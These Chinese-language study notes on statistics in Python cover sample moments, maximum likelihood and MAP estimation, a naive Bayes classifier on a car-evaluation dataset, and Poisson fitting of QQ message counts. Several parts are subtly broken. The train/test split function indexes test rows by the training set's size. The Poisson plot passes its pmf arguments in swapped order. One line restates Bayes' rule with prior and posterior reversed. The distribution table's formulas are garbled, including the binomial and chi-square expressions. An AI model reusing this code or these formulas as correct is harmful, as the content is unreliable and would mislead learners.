    • 概率论中, 我们是在假设随机变量的分布已知的前提下去研究它的规律性, 但在数理统计中, 研究的随机变量分布是未知

    • 数理统计中, 通过对研究的随机变量进行重复独立地观察, 得到大量观察数据后进行统计分析(如数据是否服从某种分布, 其数据特征(数学期望, 方差等)如何, 从而对所研究的随机变量的分布做出种种推断)

    8.4 常用的统计量

    例 8.15 求样本的均值、方差和标准差的 3 种方法

    1
    2
    3
    4
    5
    6
    7
    import numpy as np
    from math import sqrt

    # 生成样本数据
    nlist = range(0, 9_000_000)
    nlist = [float(i) / 1_000_000 for i in nlist]
    N = len(nlist)
    (1)定义法
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    sum1 = 0.0  # 样本数据之和
    sum2 = 0.0 # 样本数据平方和
    for i in range(N):
    sum1 += nlist[i]
    sum2 += nlist[i] ** 2
    mean = sum1 / N # 平均值
    var = sum2 / N - mean ** 2 # 方差 D(X) = E(X ^ 2) - [E(X)] ^ 2
    std = sqrt(var) # 标准差 ^ 2 = 方差

    mean, var, std
    (4.499999500000001, 6.750000000000028, 2.5980762113533213)
    (2)借助 Numpy 的向量运算
    1
    2
    3
    4
    5
    6
    7
    8
    9
    narray = np.array(nlist)
    sum1 = narray.sum()
    narray2 = narray * narray # 就这?
    sum2 = narray2.sum()
    mean = sum1 / N
    var = sum2 / N - mean ** 2
    std = sqrt(var)

    mean, var, std
    (4.4999994999999995, 6.749999999999915, 2.5980762113532996)
    (3)借助 Numpy 函数
    1
    2
    3
    4
    5
    mean = np.mean(nlist)
    var = np.var(nlist)
    std = np.std(nlist)

    mean, var, std
    (4.4999994999999995, 6.749999999999914, 2.5980762113532996)

    8.4 最大似然估计(MLE)

    • 对于已经出现的样本值$x _ {1}, x _ {2},…,x _ {n}$,适当地选取参数$\theta$, 使实验结果出现的概率最大

    • 似然函数$L(x|\theta)$是不确定的, $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$是既定事实(模型已定, 参数未知)

    • $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$发生的概率为$\Pi ^{n} _ {i=1}\theta ^ {x _ {i}}(1-\theta)^{1-x _ {i}})$

    • 通过对$\theta$求导等方式, 求出当$\theta$为何值时, $L(x _ {1}, x _ {2}, …, x _ {n} | \theta )$发生的概率最大

    • 参考视频: 【概率统计】最大似然估计

    8.5 最大后验估计(MAP)

    • 在最大似然估计的基础上, 添加了先验信息, 在样本较少时有用

    • $argmax \left [{\color{Red} {ln p(\theta)} + {\color{Blue}{\Sigma ^{n} _ {i=1}ln p(x _ {i}|\theta)}}} \right ]$, 先验项 + 与 MLE 等效, 利用求导等方式, 判断当$\theta$为何值时, 原式最大

    • 参考视频: 极大似然与最大后验的关系-贝叶斯法的视频超分辨率

    8.6 综合实例 1——贝叶斯用户满意度预测

    1.问题描述

    根据一些已有的汽车汽车评测满意度测评数据集,可初步了解用户对于该类型汽车的满意程度。

    2.数据准备阶段

    特征属性属性值属性说明
    Buyingvhigh, high, med, low买入价
    Maintvhigh, high, med, low维护费
    Doors2,3,4,5more车门数
    Personsvhigh, high, med, low可容纳人数
    Lug-bootsmall, med, big后备箱大小
    Safetylow, med, high安全性
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    import numpy as np
    import random
    import pandas as pd

    # 列名 = [买入价, 维护费, 车门数, 可容纳人数, 后备箱大小, 安全性, 汽车类别]
    columnsName=['buying', 'maint', 'doors', 'persons','lug-boot','safety','label']


    def getDataSet(file):
    """
    从数据集中获得数据
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
    tmp = line.strip().split(',') # 这个文件以逗号分割数据
    rdata.append(tmp)
    df = pd.DataFrame(rdata) # 读入数据到 DATAFrame 变量 df,类似二维表
    df.columns = columnsName # 设置 df 的列名
    return df


    def getTrainTest(data, trainNum):
    """
    随机抽取数据,将数据集分成训练集和测试集
    :return: 训练集, 测试集
    """
    # 从 0 到 len(data)整数列表中随机截取 trainNum 个整数片段
    """
    语法:random.sample(sequence, k)
    参数:
    sequence: 可以是一个列表,元组,字符串,或集合
    k: 一个整数值,它指定一个样本的长度
    返回:从序列中选择元素的 k 长度的新列表。
    """
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1,len(data)):
    # 如果被随机选中,加入训练集,否则测试集
    if (j < trainNum and i == choose[j]):
    dftrain.loc[dftrain.shape[0]]=data.iloc[i]
    j += 1
    else:
    dftest.loc[dftrain.shape[0]]=data.iloc[i]
    return dftrain, dftest

    3.创建一个实现朴素贝叶斯模型的类 NBClassify

    4.定义训练函数 train()

    5.数据预测

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    class NBClassify(object):
    """
    定义朴素贝叶斯模型
    """
    def __init__(self):
    # tabProbablity 核心字典,记录各类别的先验概率,格式:{'unacc':概率值, 'acc': 概率值, 'vgood': 概率值, 'good': 概率值}
    _tagProbablity = None
    # featuresProbablity 核心字典,记录各类别下各特征取值的条件概率。三级字典,
    # 格式:类别 1: {'特征 1': {'值 1': 概率值, ...'值 n': 概率值}, '特征 2':{}...},类别 2:{'特征 1': {'值 1': 概率值, ...'值 n': 概率值},
    _featuresProbablity = None

    def train(self,df):
    """
    4.定义训练函数
    利用训练数据分别计算类先验概率和似然概率
    """
    # value_counts: 查看 label 这一列的计数结果
    self._tagProbablity = df['label'].value_counts(value for value in df['label'])
    print("各类别的先验概率(各类别占比):\n", self._tagProbablity)

    # 计算各特征及对应取值的出现次数 dictFeaturesBase
    # 格式:{特征 1:{值 1:出现 5 次, 值 2:出现 1 次}, 特征 2:{值 1:出现 1 次, 值 2:出现 5 次}}
    dictFeaturesBase = {}.fromkeys(df.columns) # 创建一个字典
    for column in df.columns: # 遍历数据各列
    seriesFeature = df[column].value_counts()
    dictFeaturesBase[column] = seriesFeature
    # 从特征值字典删去类别信息
    del dictFeaturesBase['label']

    # 初始化字典 dictFeatures
    # 格式:{类别 1:{'特征 1':{'值 1':None,...'值 n':None},'特征 2':{...}},类别 2:{'特征 1':{'值 1':None, ...},...}
    dictFeatures = {}.fromkeys(df['label'])
    for key in dictFeatures.keys():
    dictFeatures[key] = {}.fromkeys([key for key in dictFeaturesBase])
    for key, value in dictFeatures.items():
    for subkey in value.keys():
    value[subkey] = {}.fromkeys([x for x in dictFeaturesBase[subkey].keys()])
    # 计算各类别、对应特征及对应取值的出现次数,存入字典 dictFeatures
    for i in range(0, len(df)):
    label = df.iloc[i]['label'] # df.iloc: 官方文档定义为“基于整数位置的索引,用于按位置进行选择。类别
    for feature in columnsName[0:6]: # 对应的特征
    fvalue = df.iloc[i][feature] # 对应的特征取值
    if dictFeatures[label][feature][fvalue] == None:
    dictFeatures[label][feature][fvalue] = 1 # 该类别下该特征值第一个出现的样本
    else:
    dictFeatures[label][feature][fvalue] += 1 # 如果已有,次数加一

    # 该类数据集若未涵盖此特征值时,加入 Laplace 平滑项
    # 拉普拉斯平滑(Laplace Smoothing)又被称为加 1 平滑,是比较常用的平滑方法。
    # 平滑方法的存在时为了解决零概率问题。比较多地出现在文本分类问题的概率处理上
    # https://blog.csdn.net/weixin_43868020/article/details/106602799
    for tag, featuresDict in dictFeatures.items():
    for featureName, featureValueDict in featuresDict.items():
    for featureKey, featureValues in featureValueDict.items():
    if featureValues == None:
    featureValueDict[featureKey] = 1

    # 由字典 dictFeatures 计算每个类别下每种特征对应值的概率,即特征的似然概率 P(feature|tag)
    for tag, featuresDict in dictFeatures.items():
    for featureName, featureValueDict in featuresDict.items():
    totalCount = sum([x for x in featureValueDict.values() if x != None])
    for featureKey, featureValues in featureValueDict.items():
    featureValueDict[featureKey] = featureValues / totalCount
    self._featuresProbablity = dictFeatures
    print("每个类别下每种特征对应值的似然概率:\n", dictFeatures)

    def classify(self, featureTuple):
    """
    对测试集进行预测
    :return: 最大后验概率的类别
    """
    resultDict = {}
    # 计算样本属于每个类别的后验概率
    for tag, featuresDict in self._featuresProbablity.items():
    iNumList = []
    i=0
    # 将各特征值对应的似然概率添加到列表 iNumList
    for feature,featureValueDict in featuresDict.items():
    featureValue = str(featureTuple[i])
    iNumList.append(self._featuresProbablity[tag][feature][featureValue])
    i=i+1
    # 列表 iNumList 中的概率相乘,得到似然概率
    conditionProbability = 1
    for iNum in iNumList:
    conditionProbability *= iNum
    # 将先验概率乘以似然概率得到后验概率 resultDict
    resultDict[tag] = self._tagProbablity[tag] * conditionProbability
    # 对比每个类别的后验概率 resultDict 的大小
    resultList = sorted(resultDict.items(), key=lambda x: x[1], reverse=True)
    # 返回最大后验概率的类别
    return resultList[0][0]

    6.主程序

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    if __name__ == '__main__':
    dfData = getDataSet('car.txt')
    # 避免过拟合,采用交叉验证,随机选取 1500 个数据作为测试集,剩余为训练集
    # 交叉验证: 在给定的建模样本中,拿出大部分样本进行建模型,留小部分样本用刚建立的模型进行预报,
    # 并求这小部分样本的预报误差,记录它们的平方加和。
    trainData, testData = getTrainTest(dfData, 1500)
    # 定义朴素贝叶斯模型
    model = NBClassify()
    # 代入训练数据集,进行模型训练
    model.train(trainData)
    # 对测试数据集进行预测,并计算错误率
    errorCount = 0
    for i in range(0, len(testData)):
    result = model.classify(testData.iloc[i][0:6])
    # 将预测的类别和实际值比较
    if testData.iloc[i][6] != result:
    errorCount += 1
    print("精度为 %f" % ((float(len(testData)) - float(errorCount)) / len(testData)))
    各类别的先验概率: unacc    0.701134acc      0.223482good     0.040027vgood    0.035357Name: label, dtype: float64每个类别下每种特征对应值的似然概率: {'unacc': {'buying': {'low': 0.21693625118934348, 'med': 0.22645099904852523, 'vhigh': 0.29590865842055186, 'high': 0.26070409134157946}, 'maint': {'med': 0.23311132254995243, 'vhigh': 0.29971455756422455, 'high': 0.25499524262607043, 'low': 0.21217887725975262}, 'doors': {'4': 0.24262607040913417, '2': 0.26831588962892483, '5more': 0.2407231208372978, '3': 0.2483349191246432}, 'persons': {'4': 0.2597526165556613, '2': 0.47573739295908657, 'more': 0.26450999048525214}, 'lug-boot': {'med': 0.3273073263558516, 'big': 0.3016175071360609, 'small': 0.37107516650808753}, 'safety': {'med': 0.29305423406279735, 'high': 0.2340627973358706, 'low': 0.47288296860133205}}, 'acc': {'buying': {'low': 0.2417910447761194, 'med': 0.2955223880597015, 'vhigh': 0.18507462686567164, 'high': 0.27761194029850744}, 'maint': {'med': 0.3044776119402985, 'vhigh': 0.1791044776119403, 'high': 0.27761194029850744, 'low': 0.23880597014925373}, 'doors': {'4': 0.2716417910447761, '2': 0.21791044776119403, '5more': 0.2626865671641791, '3': 0.24776119402985075}, 'persons': {'4': 0.5238095238095238, '2': 0.002976190476190476, 'more': 0.4732142857142857}, 'lug-boot': {'med': 0.35522388059701493, 'big': 0.382089552238806, 'small': 0.2626865671641791}, 'safety': {'med': 0.4791666666666667, 'high': 0.5178571428571429, 'low': 0.002976190476190476}}, 'vgood': {'buying': {'low': 0.5636363636363636, 'med': 0.4, 'vhigh': 0.01818181818181818, 'high': 0.01818181818181818}, 'maint': {'med': 0.3888888888888889, 'vhigh': 0.018518518518518517, 'high': 0.18518518518518517, 'low': 0.4074074074074074}, 'doors': {'4': 0.32075471698113206, '2': 0.16981132075471697, '5more': 0.3018867924528302, '3': 0.20754716981132076}, 'persons': {'4': 0.4444444444444444, '2': 0.018518518518518517, 'more': 0.5370370370370371}, 'lug-boot': {'med': 0.37037037037037035, 'big': 0.6111111111111112, 'small': 0.018518518518518517}, 'safety': {'med': 0.01818181818181818, 'high': 0.9636363636363636, 'low': 0.01818181818181818}}, 'good': {'buying': {'low': 0.6612903225806451, 'med': 0.3064516129032258, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516}, 'maint': {'med': 0.3225806451612903, 'vhigh': 0.016129032258064516, 'high': 0.016129032258064516, 'low': 0.6451612903225806}, 'doors': {'4': 0.2833333333333333, '2': 0.23333333333333334, '5more': 0.26666666666666666, '3': 0.21666666666666667}, 'persons': {'4': 0.5081967213114754, '2': 0.01639344262295082, 'more': 0.47540983606557374}, 'lug-boot': {'med': 0.3333333333333333, 'big': 0.35, 'small': 0.31666666666666665}, 'safety': {'med': 0.5409836065573771, 'high': 0.4426229508196721, 'low': 0.01639344262295082}}}精度为 0.848485

    7.利用 scikit-mean 库直接实现朴素贝叶斯方法

    • Scikit-learn 是一个开源的机器学习库,它支持有监督和无监督的学习。它还提供了用于模型拟合,数据预处理,模型选择和评估以及许多其他实用程序的各种工具。

    • 包含 3 个朴素贝叶斯的分类算法

    种类说明适用
    GaussianNB假设每个标签的数据都服从简单的正态分布样本的特征的分布大部分是连续值
    MultinationalNB假设特征是由一个简单多项式分布生成的用于描述出现次数或者出现比例的特征
    BernoulliNB假设特征的先验概率为二元伯努利分布样本特征是二元离散值或很稀疏的多元离散值
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    import pandas as pd
    import numpy as np
    import random
    from sklearn.naive_bayes import BernoulliNB

    columnsName=['buying', 'maint', 'doors', 'persons','lug-boot','safety','label']


    def getDataSet(file):
    """
    从数据集中获得数据,并进行整理
    """
    fr = open(file)
    rdata = []
    for line in fr.readlines():
    tmp = line.strip().split(',')
    rdata.append(tmp)
    df = pd.DataFrame(rdata)
    df.columns = columnsName
    # feature_codes 记录特征及数据标签的编码表,如:'buying'特征的取值及对应的编码:'vhigh': 0, 'high': 1, 'med': 2, 'low': 3
    feature_codes = [{'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
    {'vhigh': 0, 'high': 1, 'med': 2, 'low': 3},
    {'2': 0, '3': 1, '4': 2, '5more': 3},
    {'2': 0, '4': 1, 'more': 2},
    {'small': 0, 'med': 1, 'big': 2},
    {'high': 0, 'med': 1, 'low': 2},
    {'unacc':0,'acc': 1,'good': 2,'vgood':3} ]
    for i in range(0,7):
    df.iloc[:, i] = df.iloc[:,i].map(feature_codes[i])
    # Xtrain, Xtest, Ytrain, Ytest = train_test_split(df.iloc[:, 1:6], df.iloc[:, 7], test_size=0.17, random_state=420)
    return df


    def getTrainTest(data, trainNum):
    """
    随机抽取数据,将数据集分成训练集和测试集
    """
    # 从 0 到 len(data)整数列表中随机截取 trainNum 个片段
    choose = random.sample(range(len(data)), trainNum)
    choose.sort()
    j = 1
    dftrain = pd.DataFrame(columns=columnsName)
    dftest = pd.DataFrame(columns=columnsName)
    for i in range(1,len(data)):
    # 如果被随机选中,加入训练集,否则测试集
    if (j < trainNum and i == choose[j]):
    dftrain.loc[dftrain.shape[0]]=data.iloc[i]
    j += 1
    else:
    dftest.loc[dftrain.shape[0]]=data.iloc[i]
    return dftrain, dftest
    1
    2
    dfData = getDataSet('car.txt')
    dfData
    buying maint doors persons lug-boot safety label
    0 0 0 0 0 0 2 0
    1 0 0 0 0 0 1 0
    2 0 0 0 0 0 0 0
    3 0 0 0 0 1 2 0
    4 0 0 0 0 1 1 0
    ... ... ... ... ... ... ... ...
    1723 3 3 3 2 1 1 2
    1724 3 3 3 2 1 0 3
    1725 3 3 3 2 2 2 0
    1726 3 3 3 2 2 1 2
    1727 3 3 3 2 2 0 3

    1728 rows × 7 columns

    1
    2
    3
    4
    5
    6
    7
    8
    # 设置训练集和测试集
    trainData, testData = getTrainTest(dfData, 1500)
    train_X = trainData.iloc[:, :-1]
    train_Y = np.asarray(trainData.iloc[:, -1], dtype="|S6")
    test_X = testData.iloc[:, :-1]
    test_Y = np.asarray(testData.iloc[:, -1], dtype="|S6")

    train_X
    buying maint doors persons lug-boot safety
    0 0 0 0 0 0 1
    1 0 0 0 0 0 0
    2 0 0 0 0 1 1
    3 0 0 0 0 2 2
    4 0 0 0 0 2 1
    ... ... ... ... ... ... ...
    1494 3 3 3 2 1 1
    1495 3 3 3 2 1 0
    1496 3 3 3 2 2 2
    1497 3 3 3 2 2 1
    1498 3 3 3 2 2 0

    1499 rows × 6 columns

    1
    train_Y  # 训练集的测评结果
    array([b'0', b'0', b'0', ..., b'0', b'2', b'3'], dtype='|S6')
    1
    test_X # 训练集输入
    buying maint doors persons lug-boot safety
    2 0 0 0 0 1 2
    3 0 0 0 0 1 0
    11 0 0 0 1 1 0
    26 0 0 1 0 1 2
    29 0 0 1 0 2 1
    ... ... ... ... ... ... ...
    1458 3 3 2 0 2 0
    1460 3 3 2 1 0 0
    1465 3 3 2 1 2 0
    1476 3 3 3 0 0 0
    1489 3 3 3 1 2 1

    204 rows × 6 columns

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    """
    alpha : 浮点数, 可不填 (默认为 1.0)
    拉普拉斯或利德斯通平滑的参数λ,如果设置为 0 则表示完全没有平滑选项。
    但是需要注意的是,平滑相当于人为给概率加上一些噪音,
    因此λ设置得越大,伯努利朴素贝叶斯的精确性会越低(虽然影响不是非常大),布里尔分数也会逐渐升高。
    binarize : 浮点数或 None,可不填,默认为 0
    将特征二值化的阈值,如果设定为 None,则假定为特征已经被二值化完毕
    fit_prior : 布尔值, 可不填 (默认为 True)
    是否学习先验概率 P(Y=c)。如果设置为 false,则不使用先验概率,而使用统一先验概率(uniform prior),
    即认为每个标签类出现的概率是 1/n_classes
    class_prior:形似数组的结构,结构为(n_classes, ),可不不填(默认为 None)
    """
    clf = BernoulliNB()
    clf.fit(train_X, train_Y) # 训练
    predicted = clf.predict(test_X)
    predicted
    array([b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'1', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'1', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'1', b'0', b'1', b'0', b'0', b'0', b'1', b'0', b'1',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'1',       b'1', b'1', b'0', b'0', b'0', b'0', b'0', b'1', b'0', b'0', b'0',       b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0', b'0',       b'0', b'0', b'0', b'1', b'1', b'0', b'0', b'0', b'0', b'1', b'0',       b'0', b'0', b'1', b'1', b'0', b'0'], dtype='|S1')
    1
    print('精度为:%f ' % np.mean(predicted == test_Y))
    精度为:0.774725 

    8.7 综合实例 2——最大似然法求解模型参数

    数据集 QQ_data.txt 中会收集每天发出 QQ 消息的个数, 利用最大似然法估计总体分布的模型参数

    (1) 读取数据集"QQ_data.csv", 显示数据分布情况

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    import pandas as pd
    import matplotlib.pyplot as plt

    messages = pd.read_csv('QQ_data.csv') #读取数据
    fig = plt.figure(figsize=(12,5))
    plt.title('Frequency of QQmessages')
    plt.xlabel('Number of QQmessages')
    plt.ylabel('Frequency')
    plt.hist(messages['numbers'].values,range=[0, 60], bins=60, histtype='stepfilled') # 以列名为"numbers"的数据绘制直方图
    plt.show()

    png

    (2) 利用最大似然估计法求出参数$\mu$

    似然函数定义:

    $L(x;\mu)=\Pi^{n} _ {i=1}P(x _ {i};\mu)$

    为了运算方便, 通常等式两边同取对数:

    $lnL(x;\mu)=\Sigma^{n} _ {i=1}lnP(x _ {i};\mu)$

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    import matplotlib.pyplot as plt
    import numpy as np
    import pandas as pd
    import scipy
    import scipy.stats as stats
    import scipy.optimize as opt
    import statsmodels.api as sm

    messages = pd.read_csv('QQ_data.csv') #读取数据
    y_obs = messages['numbers'].values
    np.seterr(invalid='ignore')


    def poisson_logprob(mu, sign=-1):
    """
    :params mu: 泊松模型的参数值
    :params sign: 系数
    :return: 观测数据的总似然值
    """
    print(" 参数 mu: ", mu)
    """
    方法 stats.poisson.logpmf(y_obs, mu=mu) 计算在给定点 y_obs 值上服从泊松分布(参数值为 mu)的概率对数值,
    然后使用 np.sum 求和得到似然函数值
    """
    return np.sum(sign * stats.poisson.logpmf(y_obs, mu=mu))


    """
    方法 opt.minimize_scalar 通过不断迭代参数(mu), 求出(似然)函数的最小值,
    因此在(似然)函数前加上负号(就可以求出(似然)函数的最大值)
    https://vimsky.com/examples/usage/python-scipy.optimize.minimize_scalar.html
    """
    freq_results = opt.minimize_scalar(poisson_logprob)
    print("参数 mu 的估计值: %s" % freq_results['x'])

     参数 mu:  0.0 参数 mu:  1.0 参数 mu:  2.6180339999999998 参数 mu:  5.2360680251559995 参数 mu:  5.273849359457559 参数 mu:  5.334980842922849 参数 mu:  9.032120508519583 参数 mu:  15.014218190203728 参数 mu:  14.555935077084984 参数 mu:  24.69345563048985 参数 mu:  15.014218190203728 参数 mu:  18.71135779832006 参数 mu:  20.996315778882625 参数 mu:  18.38937216738971 参数 mu:  18.18406664294854 参数 mu:  18.217827603959925 参数 mu:  18.219046315052577 参数 mu:  18.2189342781152 参数 mu:  18.218934914073003 参数 mu:  18.21893518372324 参数 mu:  18.218934644422767参数 mu 的估计值: 18.218934644422767

    (3) 直观地描述利用似然函数优化参数$\mu$的过程

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    x = np.linspace(1, 60)
    y_min = np.min([poisson_logprob(i, sign=1) for i in x])
    y_max = np.max([poisson_logprob(i, sign=1) for i in x])
    # 根据不同的 mu 值[1,60],画出数据集的似然函数变化曲线
    fig = plt.figure(figsize=(6,4))
    plt.plot(x, [poisson_logprob(mu, sign=1) for mu in x])
    plt.fill_between(x, [poisson_logprob(mu, sign=1) for mu in x], \
    y_min,color='#348ABD',alpha=0.3)
    # 画出似然函数值最大的红色竖线
    plt.vlines(freq_results['x'], y_max, y_min, colors='red', linestyles='dashed')
    plt.scatter(freq_results['x'], y_max, s=110, c='red', zorder=3)
    plt.ylim(ymin=y_min, ymax=0)
    plt.title('Optimization of $\mu$')
    plt.xlabel('$\mu$')
    plt.ylabel('Log probability of $\mu$ given data')
    plt.show()

    png

    (4) 画出求得$\mu$的泊松分布图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    x_lim = 60
    mu = int(freq_results['x'])
    for i in np.arange(x_lim):
    plt.bar(i, stats.poisson.pmf(mu, i), color='#348ABD') # 柱状图
    plt.xlim(0, x_lim)
    plt.ylim(0, 0.1)
    plt.title('Estimated Poisson distribution for QQmessages') # QQ 消息数量的泊松分布估计
    plt.xlabel('Number of QQmessages') # QQ 消息数量
    plt.ylabel('Probability mass')
    plt.legend(['$\mu$ = %s' % mu])
    plt.show()

    png

    8.9 习题

    (1) 编写朴素贝叶斯分类器

    数据包含 3 中类别, 分别是{感冒, 过敏, 脑震荡}, 预测一个打喷嚏的建筑工人诊断结果

    根据贝叶斯公式:

    ${\color{Red}{P(A|B)}}={\color{Blue}{P(A)}}{\color{Green}{\frac{P(B|A)}{P(B)}}}$

    先验概率 = 后验概率 * 可能性函数

    转换成分类任务的表达式:

    $P(类别|特征)=P(类别)\frac{P(特征|类别)}{P(特征)}$

    则有:

    $P(过敏|打喷嚏,建筑工人)=P(过敏)\frac{P(打喷嚏|过敏)\cdot {\color{Red}{P(建筑工人|过敏)}}}{P(打喷嚏,建筑工人)}$
    $P(感冒|打喷嚏,建筑工人)=P(感冒)\frac{P(打喷嚏|感冒)\cdot P(建筑工人|感冒)}{P(打喷嚏,建筑工人)}$
    $P(脑震荡|打喷嚏,建筑工人)=P(脑震荡)\frac { { \color{ Red } { P(打喷嚏|脑震荡) } } \cdot P(建筑工人|脑震荡) } { P(打喷嚏,建筑工人) } $

    其中:

    $P(打喷嚏,建筑工人)=P(过敏)P(打喷嚏|过敏){\color{Red}{P(建筑工人|过敏)}}+$

    $P(感冒)P(打喷嚏|感冒)P(建筑工人|感冒)+P(脑震荡){\color{Red}{P(打喷嚏|脑震荡)}}P(建筑工人|脑震荡)$

    $=P(感冒)P(打喷嚏|感冒)P(建筑工人|感冒)$

    $=\frac{1}{2}\frac{2}{3}\frac{1}{3}$

    $=\frac{1}{9}$

    预测这个打喷嚏的建筑工人得了感冒

    1
    2
    3
    4
    5
    6
    7
    8
    import numpy as np
    import pandas as pd
    from sklearn.naive_bayes import BernoulliNB

    data = np.array([["护士", "打喷嚏", "感冒"], ["农夫", "打喷嚏", "过敏"], ["建筑工人", "头痛", "脑震荡"],
    ["建筑工人", "头痛", "感冒"], ["教师", "打喷嚏", "感冒"], ["教师", "头痛", "脑震荡"]])
    df = pd.DataFrame(data, columns=["职业", "症状", "类别"])
    df
    职业 症状 类别
    0 护士 打喷嚏 感冒
    1 农夫 打喷嚏 过敏
    2 建筑工人 头痛 脑震荡
    3 建筑工人 头痛 感冒
    4 教师 打喷嚏 感冒
    5 教师 头痛 脑震荡
    1
    2
    3
    4
    5
    6
    feature_codes = [{'护士': 0, '农夫': 1, '建筑工人': 2, '教师': 3},
    {'打喷嚏': 0, '头痛': 1},
    {'感冒': 0, '过敏': 1, '脑震荡': 2}]
    for i in range(0, len(df.columns)):
    df.iloc[:, i] = df.iloc[:,i].map(feature_codes[i])
    df
    职业 症状 类别
    0 0 0 0
    1 1 0 1
    2 2 1 2
    3 2 1 0
    4 3 0 0
    5 3 1 2
    1
    2
    3
    train_X = df[['职业', '症状']]
    train_Y = df['类别']
    train_X
    职业 症状
    0 0 0
    1 1 0
    2 2 1
    3 2 1
    4 3 0
    5 3 1
    1
    2
    test_X = pd.DataFrame(np.array([["2", "0"]]), columns=["职业", "症状"]) # 打喷嚏的建筑工人
    test_X
    职业 症状
    0 2 0
    1
    2
    3
    clf = BernoulliNB()
    clf.fit(train_X, train_Y)
    clf.predict(test_X)
    array([0], dtype=int64)

    9 随机变量的几种分布

    先列个表格把几种分布整理下?

    • 离散型
    分布律名称记作数学期望$E(X)$方差$D(X)$备注
    $P{X=0}=1-p, P{X=1}=p$0-1 分布$X\sim B(1,p)$$p$$p(1-p)$n 为 1 的二项分布,例如抛一次硬币
    $P{X=k}=C^{k} _ {n}pkq{1-k}$二项分布$X\sim B(n,p)$$np$$np(1-p)$事件{X=k}即为“n 次试验中事件 A 恰好发生 k 次”
    $P{X=k}=pq^{k-1}$几何分布$X\sim GE(p)$$\frac{1}{p}$$\frac{1-p}{p^2}$在 n 次伯努利试验中,试验 k 次才得到第一次成功的机率
    $P{X=k}=\frac{C^{k} _ {M}C^{n-k} _ {N-M}}{C^{n} _ {N}}$超几何分布$X\sim H(N,n,M)$描述了从有限 N 个物件(其中包含 M 个指定种类的物件)中抽出 n 个物件,成功抽出该指定种类的物件的次数(不放回)
    $P{X=k}=\frac{\lambda k}{k!}e{-\lambda}$泊松分布$X\sim \pi(\lambda)$$\lambda$$\lambda$适合于描述单位时间内随机事件发生的次数, 可用泊松分布近似地计算二项分布($p \le 0.1$时精确度较好)
    • 连续型
    分布函数名称记作数学期望$E(X)$方差$D(X)$备注
    $f(x)=\frac{1}{b-a},a<x<b;0,$其他均匀分布$X\sim (a,b)$$\frac{a+b}{2}$$\frac{(a-b)^2}{12}$也叫矩形分布
    $f(x\mu,\sigma)=\frac{1}{\sqrt{2\pi \sigma2}}e{-\frac{(x-\mu)2}{2\sigma2}}$正态分布$X\sim N(\mu,\sigma^2)$$\mu$$\sigma^2$
    $f(x)=\lambda e^{-\lambda x}(x>0); 0,$其他指数分布$X\sim E(\lambda)$$\frac{1}{\lambda}$$\frac{1}{\lambda^2}$唯一具有"无记忆性"的分布, 在已知$x>s$发生条件的下$P(x>s+t)=P(x>t)$
    $f(xn)=\frac{1}{x{\frac{n}{2}\Gamma(\frac{n}{2})}}x{\frac{n}{2}-1}e^{-\frac{x}{2}},x>0;0,x\le 0$卡方分布$U\sim \chi^2(n)$n2n
